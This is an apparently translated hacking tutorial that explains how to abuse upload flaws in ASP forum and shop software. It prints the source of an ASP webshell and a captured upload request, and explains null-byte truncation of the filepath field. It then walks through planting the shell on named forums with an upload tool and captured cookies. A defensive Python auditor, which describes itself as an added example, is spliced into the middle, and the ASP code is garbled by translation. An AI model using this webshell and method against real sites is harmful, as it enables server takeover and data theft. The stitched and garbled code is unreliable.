[Upload vulnerability spoofing technique]
Many programs have upload vulnerabilities, for example the whole-station program, the dynamic shopping mall, qiuye Mall, the huixin news system, and so on. This article describes how the upload vulnerability is exploited in practice, and some extensions of it. First we need to capture the data transmitted between the client and the server, so prepare an ASP trojan in advance and attempt to upload it. Of course that upload cannot succeed; what we want is the data that was submitted to the server on the way. Usually wsockexpert is used to capture it. Because there is a lot of data, only the key part is shown below:
POST /bbs/upfile.asp HTTP/1.1
...... (N irrelevant header lines omitted)
Content-Length: 1792
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: aspsessionidqqtdtatd=nldnnhpdjeehofnfbagpojkn

-----------------------------7d52191850242
Content-Disposition: form-data; name="filepath"

uploadface
-----------------------------7d52191850242
Content-Disposition: form-data; name="act"

upload
-----------------------------7d52191850242
Content-Disposition: form-data; name="file1"; filename="E:\trojan\ASP\shell.asp"
Content-Type: text/plain

<% Dim objfso %>
<% Dim fdata %>
<% Dim objcountfile %>
<% On error resume next %>
<% Set objfso = server. Create Object ("Scripting. filesystem Object ") %>
<% If trim (Request ("syfdpath") <> "" Then %>
<% Fdata = request ("cyfddata") %>
<% Set objcountfile = objfso. createtextfile (Request ("syfdpath"), true) %>
<% Objcountfile. Write fdata %>
<% If err = 0 then %>
<% Response. Write "<font color = Red> <H2> successful! </H2> <font> "%>
<% Else %>
<% Response. Write "<font color = Red> <% End if %>
<% Err. Clear %>
<% End if %>
<% Objcountfile. Close %>
<% Set objcountfile = nothing %>
<% Set objfso = nothing %>
<% Response. Write "<form action = ''' method = post>" %>
<% Response. Write "Save the message <font color = Red> For example, D: \ WEB \ x. asp </font>" %>
<% Response. Write "<input type = text name = syfdpath width = 32 size = 50>" %>
<% Response. Write "<br>" %>
<% Response. Write "address from" %>
<% = Server. mappath (request. servervariables ("script_name") %>
<% Response. Write "<br>" %>
<% Response. Write "your message:" %>
<% Response. Write "<textarea name = cyfddata Cols = 80 rows = 10 width = 32> </textarea>" %>
<% Response. Write "<input type = submit value = sky!> "%>
<% Response. Write "</form>" %>
-----------------------------7d52191850242
Content-Disposition: form-data; name="fname"

E:\trojan\ASP\shell.asp
-----------------------------7d52191850242
Content-Disposition: form-data; name="Submit"

upload
-----------------------------7d52191850242--
We now have the submitted data. Next we modify it to achieve the deception. The main changes are as follows:
1. Content-Disposition: form-data; name="file1"; filename="E:\trojan\ASP\shell.asp"
2. Content-Disposition: form-data; name="fname"
E:\trojan\ASP\shell.asp
3. Most important is the value under Content-Disposition: form-data; name="filepath". How do we add an empty (null) character after uploadface\shell.asp? UltraEdit is a good way, because it can edit in hexadecimal. Since the character '\0' occupies one position, first type a space, then switch UltraEdit to hex mode (Ctrl+H) and change the space character's 20 to 00.
4. Change Content-Length: 1792 to the actual number of characters in the submitted data.
If you change the filepath value, the length 1792 must change as well. Each letter or digit counts as 1, and do not forget that the trailing space (the null character) also counts as 1.
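From the defender's side, the bug is that the save path is built from the client-supplied filepath field and the resulting string is cut at the null byte, so an extension check on the file part alone passes. The following Python is an added example, not code from this tutorial or from any of the forum products it names; it audits a multipart body in the shape of the capture above and flags the NUL byte and the script name in the path field. The boundary, field names and sample body are constructed.

```python
import re
from os.path import splitext

# Constructed example values (assumptions, not taken from any real product).
ALLOWED_EXT = {".jpg", ".jpeg", ".gif", ".png"}   # what the site means to accept
SCRIPT_EXT = {".asp", ".asa", ".aspx", ".php"}     # what must never be written to disk
PATH_FIELDS = {"filepath", "up_path", "fname"}     # client fields the legacy code trusted

def parse_multipart(body: bytes, boundary: bytes):
    """Return (name, filename_or_None, raw_value) for each part of a multipart body."""
    parts = []
    for chunk in body.split(b"--" + boundary)[1:]:
        if chunk.startswith(b"--"):                # closing delimiter "--boundary--"
            break
        head, _, value = chunk.partition(b"\r\n\r\n")
        attrs = dict(re.findall(rb'(\w+)="([^"]*)"', head))   # name="..." filename="..."
        parts.append((attrs.get(b"name", b"").decode(), attrs.get(b"filename"), value.rstrip(b"\r\n")))
    return parts

def audit_upload(body: bytes, boundary: bytes):
    """Flag what an extension check on the file part misses: NUL bytes and script names in path fields."""
    findings = []
    for name, filename, value in parse_multipart(body, boundary):
        if filename is None:                        # ordinary text field
            visible = value.split(b"\x00", 1)[0].decode("latin-1")
            if b"\x00" in value:
                findings.append(f"NUL byte in field '{name}': a C-string file API sees only '{visible}'")
            if name.lower() in PATH_FIELDS and splitext(visible)[1].lower() in SCRIPT_EXT:
                findings.append(f"path field '{name}' names a server-side script: '{visible}'")
        else:                                       # file part: the declared filename is checked too
            ext = splitext(filename.decode("latin-1"))[1].lower()
            if ext not in ALLOWED_EXT:
                findings.append(f"file part '{name}' has disallowed extension '{ext}'")
    return findings

# Constructed body: the file part looks like a JPEG, but 'filepath' carries
# 'uploadface\shell.asp' followed by a NUL, exactly the trick described above.
BOUNDARY = b"---------------------------7d52191850242"
SAMPLE_BODY = (
    b"--" + BOUNDARY + b'\r\nContent-Disposition: form-data; name="filepath"\r\n\r\n'
    b"uploadface\\shell.asp\x00\r\n"
    b"--" + BOUNDARY + b'\r\nContent-Disposition: form-data; name="act"\r\n\r\nupload\r\n'
    b"--" + BOUNDARY + b'\r\nContent-Disposition: form-data; name="file1"; filename="shell.jpg"\r\n'
    b"Content-Type: image/jpeg\r\n\r\n\xff\xd8\xff\xe0fake-jpeg-bytes\r\n"
    b"--" + BOUNDARY + b"--\r\n"
)

if __name__ == "__main__":
    for finding in audit_upload(SAMPLE_BODY, BOUNDARY):
        print("REJECT:", finding)
```

The hardened rule that follows from this is simple: derive the destination directory and file name on the server and ignore any client path field entirely.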
[Upload vulnerability in practice]
We first practise on the dynamic network forum, the program where this vulnerability originated. From the principle above we can see that the data has to be modified and the packet has to be cut and resent during the upload, so many tools for this have appeared online. Here we simply use the Veteran upload tool, which reduces the complicated steps to changing a few pieces of data. Let's look at the tool's interface, shown in Figure 1:
Figure 1: Veteran upload tool interface
Let's take a look at the usage of the tool:
In the action field, enter the URL of the vulnerable upload file (generally the site allows you to upload jpg image files). In the file row, the first text box, file1, is the file field name in the form; after the equals sign, fill in the local path of the trojan to be uploaded. In cookies, fill in the cookie we captured with wsockexpert. Remember that it is best to register on the system first.
Here we take the intrusion of the dynamic network forum as the example. Action: fill in http://www.***.com/bbs/upfile.asp. uppath: fill in filepath in the first text box and /shell.asp in the second (you can also write /bbs/shell.asp, which uploads the file into the /bbs directory). type: enter jpg, the default file type the web program allows to be uploaded. file: enter file1 in the first text box and E:\trojan\ASP\shell.asp in the second (this is the path of the ASP trojan on your own machine; click the open icon next to file to browse for it).
Cookies: no packet capture is needed here, because this upload does not check the cookie at all; if it did, an error would be reported. Once everything is filled in, press "Submit"!
Figure 2: Upload success prompt
When you click the submit button, the tool may report a false result, so it is recommended to verify with your browser. We open the address in a browser.
Figure 3: The browser shows the upload succeeded.
The next step is to use it to write a more powerful trojan and operate from there.
[Extending the upload vulnerability in practice]
Not only the dynamic network forum has the upload vulnerability; many programs on the internet have it, and it works the same way everywhere. Once you understand the vulnerability, you can apply it to other code as needed. Next we take the qiaoke Forum as an example to extend the use of the upload vulnerability.
First register a normal user and log in, then find the upload page address: http://192.168.1.3/3/upload.asp?uppath=forum&upname=&uptext=jk_word. Viewing the source code gives the following:
--------------------------------------------------------------------------------
<form name=form1 action=?action=upfile method=post enctype=multipart/form-data>
<input type=hidden value=forum name=up_path>
<input type=hidden value=200593075710 name=up_name>
<input type=hidden value=jk_word name=up_text>
<input type=file size=40 name=file_name1>
<input type=submit value="click to upload" name=submit>
--------------------------------------------------------------------------------
Having seen the source code, we know how to fill in the Veteran upload tool.
In action, enter http://192.168.1.3/3/upload.asp?action=upfile. uppath: enter up_name in the first text box and the name of the shell to upload, shell.asp, in the second. file: enter file_name1 in the first text box and the local trojan file in the second. Here the cookie value must be filled in from the packet capture; be sure to use the cookie information captured by wsockexpert, because this program uses it for verification!
Figure 4: Settings
After everything is set, click the submit button and the tool reports that the upload succeeded. Open your browser and check whether the upload really succeeded.
Figure 5: Uploaded successfully
The webshell has been obtained, as simply as that. What matters is a flexible approach and being good at discovering whether a system has an upload vulnerability. Of course, what you can do after getting the webshell depends on the server's security configuration and your own skill; we will not discuss that here.